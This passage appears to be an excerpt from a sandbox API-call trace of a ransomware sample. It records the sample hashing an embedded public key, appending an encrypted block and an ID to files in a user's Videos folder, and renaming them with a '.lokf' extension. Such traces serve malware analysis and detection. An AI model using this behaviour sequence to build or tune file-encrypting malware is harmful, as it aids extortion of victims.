KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.334] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0059.335] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.335] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.335] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.335] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.335] GetLastError () returned 0x0 [0059.335] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.335] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0059.335] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.335] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.335] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.335] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.336] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8d57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.336] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.336] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.336] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.336] CloseHandle (hObject=0x5cc) returned 1 [0059.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.337] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\otAFCyQ0nHxWrUo d.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\otafcyq0nhxwruo d.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\otAFCyQ0nHxWrUo d.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\otafcyq0nhxwruo d.mkv.lokf")) returned 1 [0059.338] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e19520, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0xe3df79c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0xe3df79c0, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0xb018, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XBdxFZI.swf", cAlternateFileName="")) returned 1 [0059.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.338] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XBdxFZI.swf") returned=".swf" [0059.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XBdxFZI.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xbdxfzi.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.338] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=45080) returned 1 [0059.338] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.341] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xaff2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.341] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.341] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xb018, lpOverlapped=0x0) returned 1 [0059.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.342] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.343] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.343] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.343] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.343] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.343] GetLastError () returned 0x0 [0059.343] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.343] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.343] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.343] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.343] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.343] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.344] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb018, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.344] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.344] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.344] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.344] CloseHandle (hObject=0x5cc) returned 1 [0059.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0059.345] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XBdxFZI.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xbdxfzi.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XBdxFZI.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xbdxfzi.swf.lokf")) returned 1 [0059.346] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e19520, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0xe3df79c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0xe3df79c0, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0xb018, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XBdxFZI.swf", cAlternateFileName="")) returned 0 [0059.346] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0059.346] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b5f0 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260b30 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b998 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b7f8 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b790 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b728 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329a028 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b0a8 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3299fd0 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3299f78 | out: hHeap=0x660000) returned 1 [0059.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b520 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3299f20 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3299ec8 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329a290 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.347] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.348] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.348] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.348] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0059.348] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0059.348] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.349] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.349] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.349] PathFindFileNameW (pszPath="") returned="" [0059.349] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.349] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.349] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0059.349] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0059.349] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0059.349] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: 